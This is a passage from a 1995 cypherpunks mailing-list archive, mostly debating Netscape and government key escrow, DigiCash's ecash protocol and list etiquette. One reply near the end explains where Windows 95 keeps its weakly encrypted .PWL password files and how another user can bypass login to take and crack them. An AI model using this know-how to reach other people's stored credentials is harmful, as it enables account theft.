*non-*anonymous party to enforce the contract. From mtwain at netcom.com Fri Dec 1 15:57:20 1995 From: mtwain at netcom.com (Mark Twain Ecash Support) Date: Sat, 2 Dec 1995 07:57:20 +0800 Subject: DigiCash releases protocol specs! Message-ID: <199512012222.OAA18230@netcom14.netcom.com> By popular request, DigiCash is releasing the protocol specs. The specs are available at http://www.digicash.com/ecash/protocol.html Please be aware that the doccument is work in progess. More specifications, including byte level descriptions of the message format will be added throughout the weekend. --Lucky Green at -- Mark Twain Ecash Support From master at internexus.net Fri Dec 1 16:07:50 1995 From: master at internexus.net (Laszlo Vecsey) Date: Sat, 2 Dec 1995 08:07:50 +0800 Subject: Barring access to Netscape, a step better In-Reply-To: Message-ID: > The field is User-Agent. However, blocking access to users of Navigator > isn't a particularly useful thing to do. If you must do something, why > not modify your GET handler to add a header to the start of all html > pages informing people of the problem, and suggesting alternatives. Great idea! I'm sure there is a cyberpunk on this list willing to write a patch to NCSA HTTPd to get the job done, in a configurable manor of course so that a template.html would be 'inserted' at the top of every document sent out to the specified browser. Any takers? From bdavis at thepoint.net Fri Dec 1 16:19:56 1995 From: bdavis at thepoint.net (Brian Davis) Date: Sat, 2 Dec 1995 08:19:56 +0800 Subject: Netscape gives in to key escrow In-Reply-To: Message-ID: On Fri, 1 Dec 1995, Jonathan Zamick wrote: > >I they tell you about it and you buy it anyway -- tough luck. > > > > > >Same with the cars. Would *you* buy Pinto with explosives in it???? > >(leaving aside the "inherently dangerous" argument for the moment on the > >products liability claim). > > > >EBD > > Hmm. The key point is that almost no general users will have a clue what > actual security is, and what GAK is. They _might_ understand the risks of > having an explosive in their vehicle (but can just as easily argue it wasn't > properly designed if it went off improperly.) Regardless of what they'd know > about their vehicle, they can easily claim to had the risks associated with > GAK improperly represented, Netscape misleading them with deceptive claims > of security given this potential hole etc. And thus we return to my original point, which is that it will depend on what is said/disclosed. If every copy of GAKscape had a banner, bigger than the Netscape "N" which said, "The government can read every message you send using this software no matter what you do" then I think consumers will be hard pressed to say they weren't warned. > > I'm not saying whether or not this is the case, but we are very much in a > legal period where individuals are in fact expected not to need common sense, > and corporations are responsible for cleaning up after consumer stupidity. > > It is certainly true that given the general state of education regarding > crypto, the average consumer can easily say that regardless of warnings about > GAK, that they weren't properly informed of the risk. With all the hype > around security, Netscape and encryption people will be under the > impression regardless > of one little disclaimer tag, that their information is safe. Neither > government nor corporations will disabuse them of this belief. The case > would be strong against them as a consumer. I disagree. Almost nobody read the fine print on the back of a note you sign when you buy a car or otherwise take out a loan, but the provisions are generally enforceable ... Ignorance is not necessarily an excuse. > > Jonathan > > ------------------------------------------------------------------------ > ..Jonathan Zamick Consensus Development Corporation.. EBD Not a lawyer on the Net, although I play one in real life. ********************************************************** Flame away! I get treated worse in person every day!! From iang at cory.EECS.Berkeley.EDU Fri Dec 1 16:27:43 1995 From: iang at cory.EECS.Berkeley.EDU (Ian Goldberg) Date: Sat, 2 Dec 1995 08:27:43 +0800 Subject: The ecash protocol (for real) Message-ID: <199512012218.OAA20007@cory.EECS.Berkeley.EDU> Well, they did it. Probably quite a few people are sending something to this effect to CP right now, and we're crossing paths. Check out http://www.digicash.com/ecash/protpublish.html. Analysis is forthcoming (I'll probably have something useful to say by the December Bay Area meeting...). - Ian From JonathanZ at consensus.com Fri Dec 1 16:33:58 1995 From: JonathanZ at consensus.com (Jonathan Zamick) Date: Sat, 2 Dec 1995 08:33:58 +0800 Subject: Netscape gives in to key escrow Message-ID: >And thus we return to my original point, which is that it will depend on >what is said/disclosed. If every copy of GAKscape had a banner, bigger >than the Netscape "N" which said, "The government can read every message >you send using this software no matter what you do" then I think >consumers will be hard pressed to say they weren't warned. I don't mean to be inflamatory, but it isn't much of a point. They aren't going to put such a banner up because that would limit their business. The goal of Netscape (though I don't single them out), any corporation that would profit from business of those who seek encryption while still allowing GAK, and the government, is to limit the public's awareness of the size of the hole. If they let people know the extent of the hole, then they'll use products w/out it which blows profits from companies involved, and doesn't benefit the government who want it in common use. >I disagree. Almost nobody read the fine print on the back of a note you >sign when you buy a car or otherwise take out a loan, but the provisions >are generally enforceable ... Ignorance is not necessarily an excuse. The question is whether there was false representation of the security of the product. 1. The general knowledge of encryption and secure electronic financial transactions is significantly lower than that of more standard transactions. 2. Applying for a loan or buying a car involve actively going out, negotiating, signing contracts, etc. It will be much simpler to simply stick your vital info into a 'secure' browser. 3. The choice of browser to use will be done, based on representations by companies about the security of their product. If Netscape doesn't explicitly state in direct terms when accessing the browser that the GAK is a potential security risk, then they will be sued. Simply because someone will get blamed. Since they (or again any company that incorporates GAK.. I really don't want to target Netscape in specific) will make the threat sound as insignificant as possible, and not bring it to people's attention (and they can't afford to do so) when (not if) it is breached they will be taken to court repeatedly. > >EBD Jonathan ------------------------------------------------------------------------ ..Jonathan Zamick Consensus Development Corporation.. .. 1563 Solano Ave, #355.. .. Berkeley, CA 94707-2116.. .. o510/559-1500 f510/559-1505.. ..Mosaic/WWW Home Page: .. .. Consensus Home Page .. From rah at shipwright.com Fri Dec 1 16:39:01 1995 From: rah at shipwright.com (Robert Hettinga) Date: Sat, 2 Dec 1995 08:39:01 +0800 Subject: Attribution: GAK, Netscape, CyberDog, and you. Message-ID: -----BEGIN PGP SIGNED MESSAGE----- In the heat of the moment, I failed to attribute something to someone who you all should know about: Tim May, one of the founders of cypherpunks, and the person who used a greatly expanded form of this argument yesterday on that list. While I'm not a journalist, I did violate the rules of "News 101", and did not attribute the source of this excellent argument. Heavy lifting, indeed. Of course, that's nothing new. I don't believe I've ever had an original thought in my life... ;-). Cheers, Bob Hettinga P.S. Sorry, Rich, but I just had to do this one... >Netscape's Jim Clark has quite a tightrope act going. He has a stock price which gives Netscape a P/E ratio of something like 7,000 (the S&P average right now is about 14), which means he really ought to get some revenue in the door, or his investors are going to have his hide. The next thing is, the government is a *really* big customer, and *they* want GAK, in case you haven't noticed. ;-). Couple this with the fact that Netscape is pretty much replicable by concentrated developer effort because its underlying technology is an open standard, *and* the fact that any significant attempt by them to create any real proprietary standards on the internet is practically impossible in the long run, unless they get a whole lot of very big customers in a hurry. > >Now, it looks like that's what happened already, because a lot of very large companies have signed on to using Netscape servers, but you can also see how really weak Netscape's position is when Uncle Sam knocks on their door and asks for a key escrow "bug" in every "secure" Netscape web session. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBML92Q/gyLN8bw6ZVAQF1KQQAkqsgQJ/u9123iqLzYuduTbz6uQJtUuSQ q5DQY/3mwGMqwoXHgWnKkx3gsT0kAZwYWIUTaKB81S7GNsgrTtqabhAy+WlemACT 7bw1TbxRL80GKXSiSfeb1BdCyUyi/yfFO6zB3m8wWB4632Bpo5RqQEd1+jCHmDgw JHo6plE8oQ0= =/Kd2 -----END PGP SIGNATURE----- ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971 "Reality is not optional." --Thomas Sowell The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/ >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From rah at shipwright.com Fri Dec 1 16:40:52 1995 From: rah at shipwright.com (Robert Hettinga) Date: Sat, 2 Dec 1995 08:40:52 +0800 Subject: GAK, Netscape, CyberDog, and you. Message-ID: At 12:45 PM 12/1/95, Rich Salz wrote: >And my god, >five lists this time, at least some of which have over a thousand readers? Ouch! Actually, semper.fi has many times that many readers... ;-). Rich, you must be the *only* person, (besides myself), who's subscribed to *all* of those lists. I think if you check it out, that post was germaine to every single one of the lists in question. However, I'm sorry to bury you in a snowstorm. Getting 6 copies of the same thing must have pissed you off, and for that, I apologise. Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971 "Reality is not optional." --Thomas Sowell The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/ >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From adam at lighthouse.homeport.org Fri Dec 1 16:48:01 1995 From: adam at lighthouse.homeport.org (Adam Shostack) Date: Sat, 2 Dec 1995 08:48:01 +0800 Subject: (fwd) Re: SKIP domestic Source release is available Message-ID: <199512012250.RAA20268@homeport.org> A while ago, someone was asking after Sun Microsystems-Russian crypto connections. This tidbit was in sci.crypt, in a message with Message-ID: . www.elvis.ru/english/portrait.html has some on the Sun-Elvis connection. Adam >AFAIK, an international version of SKIP was developed in Russia, in >Sun parthner Elvis+. Check www.elvis.ru. I beleive one may this >implementation of SKIP outside of U.S., for example in Russia. -- "It is seldom that liberty of any kind is lost all at once." -Hume From pmonta at qualcomm.com Fri Dec 1 17:03:23 1995 From: pmonta at qualcomm.com (Peter Monta) Date: Sat, 2 Dec 1995 09:03:23 +0800 Subject: Aware's radiation detector In-Reply-To: Message-ID: <199512012258.OAA17955@mage.qualcomm.com> > This month's Scientific American has an ad by Aware for that serial port > radiation detector we were discussing a while back. Upper right corner > of page 109, I think. Sells for $149 US, 45 day money back guaranty. This wouldn't be the wavelet company in Cambridge, MA, would it? Peter Monta pmonta at qualcomm.com Qualcomm, Inc./Globalstar From futplex at pseudonym.com Fri Dec 1 17:04:44 1995 From: futplex at pseudonym.com (Futplex) Date: Sat, 2 Dec 1995 09:04:44 +0800 Subject: nsa and netscape In-Reply-To: <199512011553.JAA12735@spirit.sctc.com> Message-ID: <199512012304.SAA22488@opine.cs.umass.edu> Bob Bruen writes: # At yesterdays FNC (Federal Networking Council) meeting it was # mentioned in passing that NSA has given Netscape a grant of $5 Million # (yes $5M) to beef up the security features of Netscape. More info will # be forthcoming on this. david d `zoo' zuhn writes: > FORTEZZA support is virtually required for any sort of new network > authentication within the US DoD. > > The DoD pie is rather large, and I don't blame Netscape for trying to get > a piece of it. One can support FORTEZZA without giving in to GAK for > non-FORTEZZA users. For the moment I am inclined to agree that there's nothing terribly sinister about this. I've just been flipping through the FNC's draft Federal Internet Security Plan (FISP). In particular it mentions: ------------ 4.2 Internet Security Technology Development The IETF and other activities are currently expanding their efforts to develop and deploy technology standards to meet the growing security needs of the Internet. However, these efforts must be accelerated and facilitated by Government, since the Government has as much, if not more, interest in increasing the level of security capability in the Internet as does any other segment of society. [...] Enhance Internet Application Security A number of key Internet applications have become central to agencies' increasing Internet activities. Such key applications should be examined and, where appropriate, strengthened to the extent possible. Among the applications that require high-priority attention are the following: [...] Public Information Servers - Second only to email is the expanding use of Internet-based public information server methods, most visibly the World Wide Web and the associated Mosaic/Linx client applications. Unfortunately, there are a number of known security vulnerabilities associated with the use of these applications. ---------------- I definitely do _not_ get a sense from anything in this document that installing GAK mechanisms is a major concern of the project. The NSA appears to have a few people involved with the FNC, but not a great visible presence. -Futplex From sjb at universe.digex.net Fri Dec 1 17:07:27 1995 From: sjb at universe.digex.net (Scott Brickner) Date: Sat, 2 Dec 1995 09:07:27 +0800 Subject: Barring access to Netscape In-Reply-To: <199512010802.AAA09494@blob.best.net> Message-ID: <199512012300.SAA26991@universe.digex.net> "James A. Donald" writes: >At 12:32 AM 12/1/95 +0600, Ed Carp wrote: >>If you want to bar access to your site from a Netscape browser, such >>can easily be accomplished. If memory serves, every browser, when >>connecting to a site, exchanges certain information about the client >>with the server. One can gain access easily to that information. > >This would not be satisfactory in itself: Ideally one would like to bring >up a page saying "Sorry, you cannot access that page because you >are using a netscape browser: Click *here* for the sad tale of >Netscape. Just make all the URLs on the server point to a CGI script. The script would check the requesting browser's id and return the real data or the "sorry" message. This would allow the process to be done with *no* server changes. Since "Cypherpunks write code", one can easily imagine a hack to the Apache or NCSD or CERN servers that did the same thing without having the overhead of a CGI script for each access. From nobody at REPLAY.COM Fri Dec 1 17:10:26 1995 From: nobody at REPLAY.COM (Anonymous) Date: Sat, 2 Dec 1995 09:10:26 +0800 Subject: Draft agenda for 12/5 Key Escrow Workshop Message-ID: <199512012315.AAA14620@utopia.hacktic.nl> To: Key Escrow Distribution List From: Ed Roback, NIST Subject: Tent. Agenda for 12/5 Meeting Following for your information is the tentative agenda for the meeting next Tuesday. Attachment --------------------- D R A F T Proposed 64-bit Software Key Escrow Encryption Export Criteria Meeting Red Auditorium National Institute of Standards and Technology December 5, 1995 9:00 Welcome Ed Roback, NIST 9:10 Perspectives, Objectives of Criteria, and Future Plans Michael Nelson, Co-Chairman Interagency Working Group on Encryption and Telecommunications (IWG/ET) 9:30 Exportability Criteria Discussion Clint Brooks National Security Agency 10:45 Break 11:00 Draft Key Escrow Agent Characteristics Geoff Greiveldinger U.S. Department of Justice 12:00 Lunch (on your own, NIST cafeteria available) 1:00 Industry Perspectives Bill Sweet & Ken Mendelson, TIS Dorothy Denning, Georgetown University Melanie Janin, U.S. Council for International Business Ed Scheidt, Tecsec Jerry Berman & Daniel Weitzner, Center for Democracy and Technology Paul Lambert, Oracle David Sobol, Electronic Privacy Information Center Padgett Petersen, Lockheed-Martin Robert Holleyman, Business Software Alliance Alex McIntosh, PC Security Limited (UK) Doug Miller, Software Publishers Association (time permitting:) Randy Sabett, Spyrus Shabir Safdar, Voters Telecommunications Watch Viktor Hampel, Hampel Consulting 2:30 Break 2:45 Cont. (as necessary) 3:45 Wrapup & Adjourn Ed Appel, Co-Chairman, IWG/ET ***************************************************** Elaine Frye Computer Security Division National Institute of Standards and Technology Bldg. 820, M.S. Room 426 Gaithersburg, MD 20899-0001 Voice: 301/975-2819 Fax: 301/948-1233 ***************************************************** [Note that the planned breakout sessions originally appear to have been axed, and the meet has dwindled to a vent for industry reps who've already publicized their positions. Now watch brute key escrow spread covertly for "public security."] From adam at lighthouse.homeport.org Fri Dec 1 17:11:11 1995 From: adam at lighthouse.homeport.org (Adam Shostack) Date: Sat, 2 Dec 1995 09:11:11 +0800 Subject: Netscape gives in to key escrow In-Reply-To: Message-ID: <199512012319.SAA20311@homeport.org> Jonathan Zamick wrote: | > Brian Davis wrote: | >I they tell you about it and you buy it anyway -- tough luck. | > | > | >Same with the cars. Would *you* buy Pinto with explosives in it???? | >(leaving aside the "inherently dangerous" argument for the moment on the | >products liability claim). | > | >EBD | | Hmm. The key point is that almost no general users will have a clue what | actual security is, and what GAK is. They _might_ understand the risks of | having an explosive in their vehicle (but can just as easily argue it wasn't | properly designed if it went off improperly.) Regardless of what they'd know | about their vehicle, they can easily claim to had the risks associated with | GAK improperly represented, Netscape misleading them with deceptive claims | of security given this potential hole etc. I'd just like to add one bit to what Jonathan said here. That is the AT&T Clipper phones don't come with 'Big Brother Inside' stickers on them. The phrase 'key escrow' is not used in the manual (near as I remember.) The disclaimer is in very small print. Its not a reasonable expectation that a product being touted as 'secure' is known to its makers to be insecure. Expecting John Q. Public to know that without warning labels seems like a strech. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From adam at lighthouse.homeport.org Fri Dec 1 17:12:35 1995 From: adam at lighthouse.homeport.org (Adam Shostack) Date: Sat, 2 Dec 1995 09:12:35 +0800 Subject: available news/mail filtering In-Reply-To: <199512012001.PAA01825@bioanalytical.com> Message-ID: <199512012326.SAA20363@homeport.org> Beavis B. Thoopit wrote: | What news and mail filter programs are available? Pointers | will be appreciated. I like procmail. Its a steep learning curve, but well worth the effort. ftp.informatik.rwth-aachen.de:/pub/packages/procmail/procmail.tar.gz -- "It is seldom that liberty of any kind is lost all at once." -Hume From jcobb at ahcbsd1.ovnet.com Fri Dec 1 17:22:41 1995 From: jcobb at ahcbsd1.ovnet.com (James M. Cobb) Date: Sat, 2 Dec 1995 09:22:41 +0800 Subject: Cyberspace Inc & Robber Baron Age Message-ID: Friend, 11 29 95 Computer underground Digest carries the complete text of Rick Moore's article, Cyberspace Inc and the Robber Baron Age, an analysis of PFF's "Magna Carta" scheduled to appear in the print journal, The Information Soci- ety. Here's a sample: Instead of an infrastructure for public communications -- like the current Internet, or the American highway system -- cyber- space would be developed as a corporate owned monopoly -- priced at whatever the traffic will bear. Instead of providing a "space" in which citizens are free to speak and associate (like Internet), cyberspace would become a profit-machine and propaganda channel for media conglomerates. PFF's manifesto is a formula for neo-feudalism in the "Know- ledge Age" -- it is a charter for what could aptly be dubbed "Cyberspace Inc". The most recent issues of CuD can be obtained from http://www.soci.niu.edu/~cudigest Cordially, Jim From tcmay at got.net Fri Dec 1 17:23:19 1995 From: tcmay at got.net (Timothy C. May) Date: Sat, 2 Dec 1995 09:23:19 +0800 Subject: A "Warning Banner" for Netscape Navigator? Good idea! Message-ID: At 10:16 PM 12/1/95, Brian Davis wrote: >And thus we return to my original point, which is that it will depend on >what is said/disclosed. If every copy of GAKscape had a banner, bigger >than the Netscape "N" which said, "The government can read every message >you send using this software no matter what you do" then I think >consumers will be hard pressed to say they weren't warned. I agree with this. In fact, I think it's an excellent argument for providing this in Netscape. Seriously. A version of Netscape with such warning banners (exact wording to be determined, but probably mentioning limited key lengths, GAK, etc.) would be a Good Thing. And if Netscape Communications will not release their products in such a way, some alternatives may exist. Maybe: 1. A patch that adds this, analogous to the patches that alter the Netscape logo. 2. An entirely patched new version. Good idea, Brian! One patch I'd pay money to have is one which intercept the "commercials" Netscape blasts out at us and replace them with something else (maybe nothing, maybe a "quote for the day," maybe something from a user-selectable file of items). I understand that Netscape is collecting money for these "commercials," and that they control what is sent out. So, any such patch to intercept/remove these commercials would have to be done locally. Can this be done? --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From tcmay at got.net Fri Dec 1 17:23:29 1995 From: tcmay at got.net (Timothy C. May) Date: Sat, 2 Dec 1995 09:23:29 +0800 Subject: Too much crossposting! Choose your community and stop crossposting. Message-ID: Note: I'm not subscribed to any of the lists here except the Cypherpunks list, which I've of course been on for several years, since the start in '92. I try to avoid cross-posting to multiple lists, and almost never to lists I am not a subscriber to. (Cypherpunks gets enough spams from well-meaning folks and groups who simply must have their announcements blasted out to all the lists they think are important.) In this case, I am leaving all of the cc: lists on this message, which is a meta-message. (Hopefully some of the lists block messages from non-subscribers, which will mean those readers won't see this.) At 9:30 PM 12/1/95, Robert Hettinga wrote: >At 12:45 PM 12/1/95, Rich Salz wrote: >>And my god, >>five lists this time, at least some of which have over a thousand readers? > >Ouch! Actually, semper.fi has many times that many readers... ;-). > >Rich, you must be the *only* person, (besides myself), who's subscribed to >*all* of those lists. I think if you check it out, that post was germaine >to every single one of the lists in question. > >However, I'm sorry to bury you in a snowstorm. Getting 6 copies of the same >thing must have pissed you off, and for that, I apologise. Bob Hettinga often has some good things to say (though his journalist-style prose can get a bit purple at times, but that's just his style). However, a lot of folks have good things to say at times, and clearly these good things cannot be bounced around to all the lists which might contain readers of these good things. Mailing lists simply cannot survive if these kinds of cross-posts to four, five, or even six different lists continue. Filters are nice, though I don't relish putting Bob H. into a kill-file. People pick the mailing lists, the communities, they wish to participate in. This means they are electing not to read the traffic of other lists. C'est la vie. Even worse, massive cross-posting often produces follow-ups--such as mine here--which are "out of synch" with the themes of the particular lists. Thus, on the Cypherpunks list we sometimes get cross-posts which argue why privacy is or is not a good thing. Perhaps a reasonable thing to argue, but not on Cypherpunks. I'm sure the other lists here have had similar experiences. I urge everyone to practice some restraint. --Tim May, who has a hard enough time reading the traffic on Cypherpunks and Cyberia-l (legal issues in cyberspace) without gettting traffic on CyberHound, WWW-BUYNOW, etc. Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From cactus at hks.net Fri Dec 1 17:25:56 1995 From: cactus at hks.net (Leslie Todd Masco) Date: Sat, 2 Dec 1995 09:25:56 +0800 Subject: META: Lycos & Searchable archives Message-ID: <199511300556.AAA15009@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Someone has expressed concern to me that the cypherpunks archives are searchable via Lycos. Said person doesn't mind having the archives searchable to the smaller audience of people who go to the we-site, but is unhappy about net-wide searches turning up cypherpunks articles. Can we try to find a consensus on this? My initial inclination was to shrug the concern off (properties of information, etc, as well as c'punks being a more-or-less anarchy and the express desire for some sort of searching mechanism for c'punks), but I thought I'd double check as I've been mostly out of touch for the better part of a year. - -- Todd Masco | "life without caution/ the only worth living / love for a man/ cactus at hks.net | love for a woman/ love for the facts/ protectless" - A Rich Cactus' Homepage - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBML1HiCoZzwIn1bdtAQEtjgF/d7GBzgELk41OE+/pZxnZkzn+qYLRHmTn 8mbScBdkko83n4sxGjwFRQJyN5IlPCJQ =nFDi -----END PGP SIGNATURE----- From jamesd at echeque.com Fri Dec 1 17:26:32 1995 From: jamesd at echeque.com (James A. Donald) Date: Sat, 2 Dec 1995 09:26:32 +0800 Subject: The future will be easy to use Message-ID: <199511300704.XAA01742@blob.best.net> On Mon, 27 Nov 1995, James A. Donald wrote: >> You are making the same erroneous assumption that Phil made when he >> designed the Web of trust: You assume that it is important and >> interesting to link key ID's to physical bodies. This is usually >> not the case: Linking key ID's to home web pages etc is not only >> easier -- it is also usually more interesting and important. At 02:46 PM 11/29/95 -0500, Jon Lasser wrote: >Not if you're encrypting a Credit Card transaction to ship physical >goods. In that case, I'm going to certainly want to link a key ID to a >physical body (or at least address) if I'm the seller, so as to limit >liability as best I can. Not at all: All you need to do is be able to prove you shipped to the address requested: You do not have to know what the relationship is between the address requested and identity paying you to ship. > However, if you have optional linking of ID and name, shippers will only > ship to keys with such attributes. Because just ID and address, it could > be a "hit and run" type attack shipped to a safe maildrop. This argument makes no sense at all: I am going to attack my enemies by paying people to send books, computers, and stuff to them? --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From rah at shipwright.com Fri Dec 1 17:44:33 1995 From: rah at shipwright.com (Robert Hettinga) Date: Sat, 2 Dec 1995 09:44:33 +0800 Subject: Aware's radiation detector Message-ID: >> This month's Scientific American has an ad by Aware for that serial port >> radiation detector we were discussing a while back. Upper right corner >> of page 109, I think. Sells for $149 US, 45 day money back guaranty. > >This wouldn't be the wavelet company in Cambridge, MA, would it? This reminds me at mobile world this week, some of the wearables guys at Steve Roberts' BEHEMOUTH booth showed me a $20 alpha and beta detector half the size of a matchbook. Said something about it being Russian surplus... Cheers, Bob ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971 "Reality is not optional." --Thomas Sowell The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/ >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From ericm at lne.com Fri Dec 1 17:54:40 1995 From: ericm at lne.com (Eric Murray) Date: Sat, 2 Dec 1995 09:54:40 +0800 Subject: A "Warning Banner" for Netscape Navigator? Good idea! In-Reply-To: Message-ID: <199512020122.RAA24017@slack.lne.com> Timothy C. May writes: > One patch I'd pay money to have is one which intercept the "commercials" > Netscape blasts out at us and replace them with something else (maybe > nothing, maybe a "quote for the day," maybe something from a > user-selectable file of items). > > I understand that Netscape is collecting money for these "commercials," and > that they control what is sent out. So, any such patch to intercept/remove > these commercials would have to be done locally. Can this be done? You can fix this from the browser. Pull down the 'Options' menu, grab the 'Window and Link styles' page, and change the default "home page location" from netscape's to whatever you want. I usually use my own home page. I never look at Netscape's pages unless I specifically want to see something like SSL specs. If there wasn't a way to turn off their home page I'd be pretty pissed off. The descripton above is from the 1.1 browser; the 2.0x ones are fairly similar. -- Eric Murray ericm at lne.com ericm at motorcycle.com http://www.lne.com/ericm Redistribution of this message without the author's permission is forbidden! PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03 92 E8 AC E6 7E 27 29 AF From master at internexus.net Fri Dec 1 17:56:25 1995 From: master at internexus.net (Laszlo Vecsey) Date: Sat, 2 Dec 1995 09:56:25 +0800 Subject: Windows95 "Security" Message-ID: Where is the password data file kept? From tcmay at got.net Fri Dec 1 18:10:15 1995 From: tcmay at got.net (Timothy C. May) Date: Sat, 2 Dec 1995 10:10:15 +0800 Subject: A "Warning Banner" for Netscape Navigator? Good idea! Message-ID: At 1:22 AM 12/2/95, Eric Murray wrote: >You can fix this from the browser. >Pull down the 'Options' menu, grab the 'Window and Link styles' >page, and change the default "home page location" from >netscape's to whatever you want. I usually use my own home page. >I never look at Netscape's pages unless I specifically want to >see something like SSL specs. If there wasn't a way to >turn off their home page I'd be pretty pissed off. Oh, I don't have their home page enabled. What I meant, but perhaps wasn't clear about in my post, is that the commercials pop up in Yahoo, Infoseek, Deja News, Excite, and so forth. (OK, so it is inaccurate to say "Netscape" puts them in.) Some of the ads are intertwined with the command boxes of the particular service, and thus may be hard to excise, but others seem to be separate. Any ideas? --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From rah at shipwright.com Fri Dec 1 18:20:23 1995 From: rah at shipwright.com (Robert Hettinga) Date: Sat, 2 Dec 1995 10:20:23 +0800 Subject: Cyberspace Inc & Robber Baron Age Message-ID: > Instead of an infrastructure for public communications -- like > the current Internet, or the American highway system -- cyber- > space would be developed as a corporate owned monopoly -- > priced at whatever the traffic will bear. More technophobic hogwash from an industrial-centralist mind. Anyone who looks at the possibilty of semi-autonomous, hell, autonomous, software out there buying and selling things "out of control" of the people who use it, much less those who wrote it, in an emergent-structure chaotic microtransaction market, on a network where the price of semiconductor switching falls exponentially, making everything, code, hardware, link-lengh, everything, smaller and smaller and faster and faster, (inhale) can't possibly say stuff like that. These folks are looking backwards so far they're going to trip over the future. Feh. ;-) Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971 "Reality is not optional." --Thomas Sowell The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/ >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From yusuf921 at uidaho.edu Fri Dec 1 18:35:40 1995 From: yusuf921 at uidaho.edu (Syed Yusuf) Date: Sat, 2 Dec 1995 10:35:40 +0800 Subject: available news/mail filtering In-Reply-To: <199512012001.PAA01825@bioanalytical.com> Message-ID: On Fri, 1 Dec 1995, Beavis B. Thoopit wrote: > What news and mail filter programs are available? Pointers > will be appreciated. I use procmail in a .procmailrc through my .forward -- Syed Yusuf | http://www.uidaho.edu/~yusuf921 Keep me away from Wisdom that does not Cry, Philosophy that does not Laugh, and Greatness that does not bow before Children --Kalil Gibran From jimbell at pacifier.com Sat Dec 2 10:41:02 1995 From: jimbell at pacifier.com (jim bell) Date: Sat, 2 Dec 95 10:41:02 PST Subject: "Got a subpoena?" Message-ID: >On Thu, 30 Nov 1995, sameer wrote: > >> > >> > What about a court order to (a) start comprehensive logging, and (b) not >> > tell anyone under penalty of ______ . > >I am unaware of any authority for such an order. >> >> Aren't court orders part of the public record? I don't quite > >Yes, but court orders can be sealed pending further order of the court. Okay, maybe with your qualifications you can answer this. It has always mystified me why "the authorities" think they can engage in wiretapping without informing the person wiretapped that this has occurred, despite the fact that there was apparently never any precedent for this practice before the "wiretap era." In addition, I would like to be able to figure out a method to allow the de-facto disclosure of such activities, and to in fact force the phone company to do so, if they are asked to tap my or anyone else's phone. It occurred to me that even if there was a prohibition on explicitly revealing that such a tap exists, it should be possible to require the telephone company to certify that no tap exists, and to require that this certification will be followed by an explicit and immediate de-certification message the moment the phone company is unable to maintain such certification. The receipt of such a letter/fax/email will indicate that a tap has been placed, despite the fact that it will not say so. >EBD > >Not a lawyer on the Net, although I play one in real life. > From llurch at networking.stanford.edu Fri Dec 1 18:43:45 1995 From: llurch at networking.stanford.edu (Rich Graves) Date: Sat, 2 Dec 1995 10:43:45 +0800 Subject: Windows95 "Security" In-Reply-To: Message-ID: On Fri, 1 Dec 1995, Laszlo Vecsey wrote: > Where is the password data file kept? A separate password file is kept for each "user" in: C:\WINDOWS\*.PWL .PWL files are weakly encrypted with the "default login" password. Once you decrypt them, they contain cleartext passwords for every other password-protected resource accessed by that user (network servers, screen savers, dial-up networking, possibly .PWL-enabled encryption utilities). Somebody supposedly posted code for decrypting .PWL files to sci.crypt. .PWL files are persistent, i.e., Joe "logs on," saves a couple passwords, "logs off," then Judy comes by, hits Escape or various other trivial tricks to avoid the need to "log on," picks up Joe's .PWL file, and cracks it at her leisure. Each "user" also gets an unencrypted "profile" that gives all application preferences. Anyone who treats Win95 as if it were a multiuser system is an idiot. -rich From kinney at bogart.Colorado.EDU Fri Dec 1 19:02:39 1995 From: kinney at bogart.Colorado.EDU (W. Kinney) Date: Sat, 2 Dec 1995 11:02:39 +0800 Subject: Talking to Jim In-Reply-To: <199512012310.KAA23844@iccu6.ipswich.gil.com.au> Message-ID: <199512020156.SAA15123@bogart.Colorado.EDU> > I emailed Jim Clark day before yesterday about his comments re key escrow. > He responded. Woah. What a radical idea. Have any of the people busily working away at web pages slamming Netscape actually bothered to verify that Jim Clark actually said any of the things he is rumored to have said? I haven't seen any 